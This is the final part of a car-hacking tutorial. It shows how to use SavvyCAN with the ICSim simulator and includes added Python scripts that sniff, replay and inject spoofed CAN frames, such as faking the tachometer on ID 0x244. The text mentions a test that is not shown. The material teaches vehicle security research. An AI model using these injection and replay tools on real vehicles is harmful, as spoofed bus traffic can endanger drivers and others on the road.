Car Hacking: The ultimate guide! - Part III

In the previous two parts we saw how to install the car simulator on our machine, the programs we need to use and the equipment required. In today's article we present the exploitation process in detail.


We will now look at what SavvyCAN is and use it with ICSim. After that, we will use SavvyCAN to replay captured frames, identify arbitration IDs and send custom frames.


SavvyCAN

There are various programs that will help you monitor and filter CAN traffic.

There are expensive, proprietary tools as well as free and open-source ones.

The purpose of this article is to help you get started with car hacking at no cost, so expensive tools are not on our list.

I have already written in detail about the cheap and free alternatives to these expensive CAN tools. Tools like can-utils and Wireshark work just fine.

But SavvyCAN provides much more. For beginners it offers a nice GUI that makes it easy to navigate and to filter frames, IDs and so on. For those who are already into car hacking, SavvyCAN offers truly great features. My personal favourite features include the ability to run scripts against the CAN traffic.

Let's look at the definition of SavvyCAN from their website.

“SavvyCAN is a C++ program based on the cross-platform Qt framework. It is a CAN bus reverse engineering and capture tool. Originally written to use EVTV hardware such as EVTVDue and CANDue, it has since been extended to use any SocketCAN compatible device as well as the Macchina M2 and Teensy 3.x boards. It can capture and send to multiple buses and CAN devices at the same time.”

You can find more information here:  https://www.savvycan.com/

I find SavvyCAN very easy to use compared to can-utils. Again, let's not start a debate about which tool is best and which is not, as long as it serves your purpose.


SavvyCAN installation

Installing SavvyCAN is really easy. You can download prebuilt binaries for Linux, Mac and Windows from https://www.savvycan.com

Install and run on Ubuntu

wget https://github.com/collin80/SavvyCAN/releases/download/V199.1/SavvyCAN-305dafd-x86_64.AppImage

No installation is required: download the AppImage, make it executable and run it.

chmod +x SavvyCAN-305dafd-x86_64.AppImage
./SavvyCAN-305dafd-x86_64.AppImage

SavvyCAN now starts.


You can play with SavvyCAN for a while. If you want to use SavvyCAN with a Macchina M2 or other compatible hardware, no additional installation is needed.

We plan to use SavvyCAN with ICSim, so we need qtserialbus.

Once the SavvyCAN window is open, navigate to Connection -> Open Connection Window -> Add New Device Connection and you will see that the QT SerialBus connection type is greyed out (disabled).


Let's install qtserialbus so we can use it with ICSim.

Installing Qt 5

$ wget https://download.qt.io/official_releases/qt/5.14/5.14.2/qt-opensource-linux-x64-5.14.2.run

After downloading the Qt 5 installer, make it executable and run it:

$ chmod a+x ./qt-opensource-linux-x64-5.14.2.run
$ sudo ./qt-opensource-linux-x64-5.14.2.run

Make a note of the installation path you choose; you will need it later.

Once Qt 5 is installed, you need to build qtserialbus yourself, because it is not included in the official Ubuntu repository.

Install qtserialbus

$ sudo apt install qtdeclarative5-dev qttools5-dev g++
$ git clone https://github.com/qt/qtserialbus
$ cd qtserialbus
$ /home/y0g3sh/Qt5.14.2/5.14.2/gcc_64/bin/qmake .
$ make
$ sudo make install

Replace /home/y0g3sh/Qt5.14.2 with the installation path you noted earlier, so that the qmake of the Qt you just installed is used rather than the system one. The qtserialbus sources must also match that Qt version: if the build complains about a version mismatch, check out the matching branch in the clone (for Qt 5.14.2 that is the 5.14 branch).

Build SavvyCAN

To use qtserialbus, the SavvyCAN AppImage you downloaded earlier will not work: SavvyCAN has to be built with qmake against the Qt you just installed.

$ git clone https://github.com/collin80/SavvyCAN
$ cd SavvyCAN
$ /home/y0g3sh/Qt5.14.2/5.14.2/gcc_64/bin/qmake CONFIG+=debug
$ make

The build will take some time.

Once everything is built, start the ICSim simulator as in the previous parts (everything except the can-utils tools). Instead of recording the CAN traffic with can-utils, we will capture it with SavvyCAN over SocketCAN.

Start SavvyCAN

Start the SavvyCAN we just built, not the AppImage we downloaded earlier.

Remember, if you want to run this against a real car and do not need qtserialbus, you can still use the AppImage and skip the hassle of building SavvyCAN.

$ cd SavvyCAN
$ ./SavvyCAN

Now open the connection window and you will notice that QT SerialBus is enabled.


Connect SavvyCAN to vcan0 over SocketCAN

To create a new connection in SavvyCAN:

  1. Open SavvyCAN
  2. Go to Connection -> Open Connection Window -> Add New Device Connection
  3. Configure the connection with the following settings:

Connection type: QT SerialBus Devices
SerialBus Device type: socketcan
Port: vcan0


Then create the connection.
Once the connection is up, you will see CAN frames appearing in the SavvyCAN window, which is a good sign that everything is working.
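Under the hood, the QT SerialBus socketcan plugin that SavvyCAN uses reads and writes the Linux kernel's raw struct can_frame records on vcan0. The following Python script is added here as an example and is not part of the original article or of SavvyCAN: it encodes and decodes that 16-byte layout and, on Linux with ICSim running, prints the same frames SavvyCAN shows, in candump notation. The interface name vcan0 and the IDs used in the examples are assumptions; only the standard library is needed.

```python
import socket
import struct

# Wire layout of the Linux kernel's struct can_frame (linux/can.h):
# u32 can_id (flags in the top 3 bits), u8 len, 3 padding bytes, 8 data bytes = 16 bytes.
CAN_FRAME_FMT = "=IB3x8s"
CAN_FRAME_SIZE = struct.calcsize(CAN_FRAME_FMT)

CAN_EFF_FLAG = 0x80000000  # 29-bit (extended) identifier
CAN_RTR_FLAG = 0x40000000  # remote transmission request
CAN_ERR_FLAG = 0x20000000  # error message frame
CAN_SFF_MASK = 0x000007FF
CAN_EFF_MASK = 0x1FFFFFFF


def build_can_frame(arb_id, data, extended=False):
    """Encode one classic CAN frame in the form SocketCAN reads and writes."""
    data = bytes(data)
    if len(data) > 8:
        raise ValueError("classic CAN frames carry at most 8 data bytes")
    if extended:
        can_id = (arb_id & CAN_EFF_MASK) | CAN_EFF_FLAG
    elif arb_id <= CAN_SFF_MASK:
        can_id = arb_id
    else:
        raise ValueError("ID does not fit in 11 bits; pass extended=True")
    return struct.pack(CAN_FRAME_FMT, can_id, len(data), data.ljust(8, b"\x00"))


def parse_can_frame(raw):
    """Decode a raw 16-byte SocketCAN frame into (arbitration ID, data, flags)."""
    if len(raw) != CAN_FRAME_SIZE:
        raise ValueError(f"expected {CAN_FRAME_SIZE} bytes, got {len(raw)}")
    can_id, length, payload = struct.unpack(CAN_FRAME_FMT, raw)
    if length > 8:
        raise ValueError(f"invalid data length {length}")
    flags = {
        "extended": bool(can_id & CAN_EFF_FLAG),
        "rtr": bool(can_id & CAN_RTR_FLAG),
        "error": bool(can_id & CAN_ERR_FLAG),
    }
    mask = CAN_EFF_MASK if flags["extended"] else CAN_SFF_MASK
    return can_id & mask, payload[:length], flags


def format_frame(arb_id, data, extended=False):
    """Render a frame the way candump and SavvyCAN's log import show it, e.g. 244#000000000A000000."""
    return f"{arb_id:0{8 if extended else 3}X}#{data.hex().upper()}"


def sniff(interface="vcan0", count=20):
    """Read `count` frames from a SocketCAN interface and return them decoded (Linux only)."""
    sock = socket.socket(socket.AF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
    sock.bind((interface,))
    frames = []
    try:
        while len(frames) < count:
            frames.append(parse_can_frame(sock.recv(CAN_FRAME_SIZE)))
    finally:
        sock.close()
    return frames


if __name__ == "__main__":
    # With ICSim running against vcan0 this prints the same frames SavvyCAN shows.
    for arb_id, data, flags in sniff("vcan0", 20):
        print(format_frame(arb_id, data, flags["extended"]))
```

Note the length check in parse_can_frame: SocketCAN will never hand you more than 8 data bytes for a classic frame, but a log file or a network-forwarded capture can, and trusting the length field blindly is how frame parsers end up reading past their buffer.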


To get a better feel for SavvyCAN, let's redo the things we did earlier with can-utils, this time in SavvyCAN.

SavvyCAN provides a nice, intuitive interface for filtering frames by ID. Untick the IDs you are not interested in in the right-hand pane and only the remaining IDs are shown, which lets you quickly home in on the ID related to an action.

Another very useful option is the "Replacement Mode" (overwrite mode) checkbox on the main window. When it is enabled, a new frame whose ID is already in the list overwrites the existing row instead of being appended, so the list stays at one row per ID and you can watch the data bytes change in place.


Replay Attack

Performing a replay attack with SavvyCAN is much easier. Open the playback window from the Send Frames menu. You can either load frames from a file or take them directly from the frames you have just captured, and you can choose which IDs to replay from the ID filter list. Note that the frames you replay are mixed with the traffic that ICSim's controls program keeps sending on vcan0, so if both carry the same ID the display will jump between the two values.
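To make the replay concrete, here is an added Python example (not code from the article or from SavvyCAN) that does what the playback window does: it parses a candump -l style log, keeps only the IDs you select, and resends the frames on vcan0 with their original spacing. The log lines are constructed sample data, not a real ICSim recording, and the interface name vcan0 is an assumption.

```python
import re
import socket
import struct
import time

# Constructed sample capture in candump -l format, "(timestamp) interface ID#DATA".
# Not a real ICSim recording; byte 4 of ID 0x244 climbs as if the accelerator were pressed.
SAMPLE_LOG = """\
(1700000000.000123) vcan0 244#000000000A000000
(1700000000.010456) vcan0 19B#000000000000
(1700000000.020789) vcan0 244#0000000014000000
(1700000000.030111) vcan0 188#00000000
(1700000000.040222) vcan0 244#000000001E000000
"""

LINE_RE = re.compile(
    r"^\((?P<ts>\d+\.\d+)\)\s+(?P<iface>\S+)\s+"
    r"(?P<id>[0-9A-Fa-f]{3,8})#(?P<data>(?:[0-9A-Fa-f]{2}){0,8})$"
)


def parse_candump_log(text):
    """Parse candump -l lines into (timestamp, arbitration ID, data bytes) tuples."""
    frames = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if m is None:
            raise ValueError(f"line {lineno}: unrecognised candump record {line!r}")
        frames.append((float(m["ts"]), int(m["id"], 16), bytes.fromhex(m["data"])))
    return frames


def select_frames(frames, ids=None):
    """Keep only the IDs you ticked in SavvyCAN's filter list (None keeps everything)."""
    if ids is None:
        return list(frames)
    return [f for f in frames if f[1] in ids]


def inter_frame_delays(frames, speed=1.0):
    """Turn absolute timestamps into the delay to wait before each frame (speed=2.0 halves them)."""
    delays, prev = [], None
    for ts, _, _ in frames:
        delays.append(0.0 if prev is None else max(0.0, (ts - prev) / speed))
        prev = ts
    return delays


def pack_frame(arb_id, data):
    """Encode the 16-byte struct can_frame SocketCAN expects; 29-bit IDs get the EFF flag."""
    can_id = arb_id if arb_id <= 0x7FF else (arb_id & 0x1FFFFFFF) | 0x80000000
    return struct.pack("=IB3x8s", can_id, len(data), bytes(data).ljust(8, b"\x00"))


def replay(frames, interface="vcan0", speed=1.0, loops=1):
    """Send the frames in their original order and pacing; returns the number of frames sent."""
    sock = socket.socket(socket.AF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
    sock.bind((interface,))
    sent = 0
    try:
        for _ in range(loops):
            for delay, (_, arb_id, data) in zip(inter_frame_delays(frames, speed), frames):
                time.sleep(delay)
                sock.send(pack_frame(arb_id, data))
                sent += 1
    finally:
        sock.close()
    return sent


if __name__ == "__main__":
    # Replay only the speed ID and loop it so the needle in ICSim keeps moving.
    log = parse_candump_log(SAMPLE_LOG)
    print(replay(select_frames(log, {0x244}), "vcan0", loops=10), "frames sent")
```

The parser refuses lines it does not recognise instead of skipping them: a log that has been hand-edited or truncated should fail loudly before anything is put on the bus.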

Determination of arbitration ID

Many people ask me how to identify which ID does what in a car. Finding arbitration IDs can sometimes be very difficult.

SavvyCAN provides many RE tools. The one I use most often is the "Sniffer". It lets me "fade out" bytes that do not change, so that the IDs and bytes that react to an action stand out.

For example, let's look at the tachometer ID. To identify it, I open the Sniffer and fade out the inactive bytes.

My approach is this: say there are 20 IDs on the bus. I untick at least a third of them, press the accelerator in the car or in ICSim, and watch which frames change. I repeat this until I am left with a single ID.

Let's look at Sniffer, one of SavvyCAN RE tools in action.


Here I did not find any change in the bytes that corresponds to my action, so I move on to other IDs.


It seems that 0x244 is what we are looking for. You can see the pattern in the changing bytes when the accelerator is pressed: as the speed increases, the tachometer value changes in bytes 3 and 4 (counting from byte 0).

You can do this for every action available in ICSim.
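The elimination process above can be expressed in code. The following Python example is added here and is not part of the article or of SavvyCAN's Sniffer: it takes two captures as (ID, data) pairs, one at idle and one while the accelerator is pressed, and reports the bytes that move only during the action. The captures are constructed sample data; they include a rolling counter on a made-up ID 0x133 to show why comparing against an idle baseline matters.

```python
from collections import defaultdict

# Constructed captures as (arbitration ID, data) pairs, not real ICSim output.
# 0x133 (made up) carries a rolling counter in its last byte that ticks no matter what you do.
IDLE = [
    (0x244, bytes.fromhex("0000000000000000")),
    (0x133, bytes.fromhex("0000000000000001")),
    (0x188, bytes.fromhex("00000000")),
    (0x244, bytes.fromhex("0000000000000000")),
    (0x133, bytes.fromhex("0000000000000002")),
    (0x19B, bytes.fromhex("000000000000")),
]
THROTTLE = [
    (0x244, bytes.fromhex("000000000A000000")),
    (0x133, bytes.fromhex("0000000000000003")),
    (0x188, bytes.fromhex("00000000")),
    (0x244, bytes.fromhex("000000012C000000")),
    (0x133, bytes.fromhex("0000000000000004")),
    (0x19B, bytes.fromhex("000000000000")),
    (0x244, bytes.fromhex("0000000258000000")),
]


def group_by_id(frames):
    """Bucket payloads by arbitration ID, preserving capture order."""
    groups = defaultdict(list)
    for arb_id, data in frames:
        groups[arb_id].append(bytes(data))
    return groups


def changed_bytes(payloads):
    """Byte positions that differ from the first payload at least once within the window."""
    first = payloads[0]
    changed = set()
    for payload in payloads[1:]:
        for pos in range(min(len(first), len(payload))):
            if payload[pos] != first[pos]:
                changed.add(pos)
    return changed


def fade_inactive(idle, action):
    """Return {arbitration ID: [byte positions]} that move during the action but sat still at idle.

    Bytes that also change at idle (counters, checksums, periodic sensors) are faded out,
    which is what the Sniffer does visually when you fade inactive bytes."""
    idle_noise = {arb_id: changed_bytes(p) for arb_id, p in group_by_id(idle).items()}
    hits = {}
    for arb_id, payloads in group_by_id(action).items():
        live = changed_bytes(payloads) - idle_noise.get(arb_id, set())
        if live:
            hits[arb_id] = sorted(live)
    return hits


def narrow_down(idle, captures):
    """Repeat the elimination over several action captures; keep the IDs that react every time."""
    survivors = None
    for capture in captures:
        reacting = set(fade_inactive(idle, capture))
        survivors = reacting if survivors is None else survivors & reacting
    return sorted(survivors or [])


if __name__ == "__main__":
    for arb_id, positions in fade_inactive(IDLE, THROTTLE).items():
        print(f"0x{arb_id:03X}: bytes {positions} react to the action")
```

On the constructed data only 0x244 survives, with bytes 3 and 4 flagged; 0x133 changes constantly but is faded out because it changed at idle too. Running narrow_down with several captures of the same action is the programmatic version of repeating the untick-and-press cycle until one ID is left.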

Send custom frames

SavvyCAN also lets you modify frames on the fly while sending custom frames. To do this, open the Frame Sender from the Send Frames menu.

Let's "fool" the tachometer. From the example above, where we sniffed the frames, we saw how the tachometer is driven.

Bytes 3 and 4 increase as the throttle increases. So we will send a custom frame and modify its bytes on the fly while observing the tachometer.

In the Frame Sender, the Data column holds the hexadecimal bytes, the ID must be in the form 0x123, the Trigger is the interval in milliseconds between frames, and the Modifications column holds the byte-level changes applied after each send.

For example, say I want to send on Bus 0 to ID 0x244 (tachometer), with data 0x00 0x00 0x00 0x00 0x00, and increase byte 3 by 2 each time; in the Modifications column I write d3 = d3 + 2. When done, make sure the Enable checkbox is ticked.
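As an added example (not the article's or SavvyCAN's own code), the Python script below reproduces what the Frame Sender does with a Modifications expression such as d3 = d3 + 2: it generates the successive payloads and, on Linux, sends them on vcan0 every trigger_ms milliseconds. The expression syntax it accepts (d0..d7, integer literals and the usual arithmetic and bitwise operators) is an approximation of SavvyCAN's and is an assumption, as are the interface name and the 8-byte payload. The expression is evaluated through a whitelisted AST walk rather than eval(), so a malformed or hostile expression is rejected instead of executed.

```python
import ast
import operator
import socket
import struct
import time

# Operators allowed inside a modification expression. Anything else (calls, attributes,
# names other than d0..d7) is rejected, so an expression from an untrusted project file
# cannot run arbitrary Python.
_BINOPS = {
    ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul,
    ast.BitAnd: operator.and_, ast.BitOr: operator.or_, ast.BitXor: operator.xor,
    ast.LShift: operator.lshift, ast.RShift: operator.rshift,
}


def _byte_index(name, width):
    """'d3' -> 3 if it names a byte that exists in the payload, otherwise raise."""
    name = name.strip().lower()
    if len(name) == 2 and name[0] == "d" and name[1].isdigit() and int(name[1]) < width:
        return int(name[1])
    raise ValueError(f"{name!r} is not a data byte d0..d{width - 1}")


def _evaluate(node, data):
    """Evaluate a parsed expression against the current payload, allowing only whitelisted nodes."""
    if isinstance(node, ast.Constant) and isinstance(node.value, int):
        return node.value
    if isinstance(node, ast.Name):
        return data[_byte_index(node.id, len(data))]
    if isinstance(node, ast.BinOp) and type(node.op) in _BINOPS:
        return _BINOPS[type(node.op)](_evaluate(node.left, data), _evaluate(node.right, data))
    raise ValueError(f"unsupported expression element: {ast.dump(node)}")


def parse_modifications(text, width=8):
    """'d3 = d3 + 2, d4 = d3 * 16' -> [(3, <expr>), (4, <expr>)]"""
    rules = []
    for clause in text.split(","):
        if not clause.strip():
            continue
        lhs, sep, rhs = clause.partition("=")
        if not sep:
            raise ValueError(f"missing '=' in {clause!r}")
        rules.append((_byte_index(lhs, width), ast.parse(rhs.strip(), mode="eval").body))
    return rules


def apply_modifications(data, rules):
    """Apply the rules in order (later rules see earlier results); each result wraps to one byte."""
    out = bytearray(data)
    for index, expr in rules:
        out[index] = _evaluate(expr, out) & 0xFF
    return bytes(out)


def generate_frames(arb_id, data, modifications, count):
    """The sequence the Frame Sender emits: frame 0 is the data as typed, each later frame is modified."""
    rules = parse_modifications(modifications, len(data))
    frames, current = [], bytes(data)
    for _ in range(count):
        frames.append((arb_id, current))
        current = apply_modifications(current, rules)
    return frames


def send_frames(arb_id, data, modifications, trigger_ms, count, interface="vcan0"):
    """Put the generated frames on a SocketCAN interface, one every trigger_ms milliseconds."""
    sock = socket.socket(socket.AF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
    sock.bind((interface,))
    try:
        for _, payload in generate_frames(arb_id, data, modifications, count):
            sock.send(struct.pack("=IB3x8s", arb_id, len(payload), payload.ljust(8, b"\x00")))
            time.sleep(trigger_ms / 1000)
    finally:
        sock.close()


if __name__ == "__main__":
    # ID 0x244, eight zero bytes, byte 3 grows by 2 every 10 ms: the needle climbs until it wraps.
    send_frames(0x244, bytes(8), "d3 = d3 + 2", 10, 200)
```

Because every result is masked to one byte, d3 wraps from 0xFE to 0x00, which is the moment the needle in ICSim drops back to zero; the test below checks that wrap, and also that expressions containing calls or attribute access are rejected rather than evaluated.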


This is where the Car Hacking guide series ends.

I hope you enjoyed it and found it interesting. I look forward to your comments and observations, as well as your recommendations of similar programs and the methods you use yourselves.

Written by Anastasis Vasileiadis
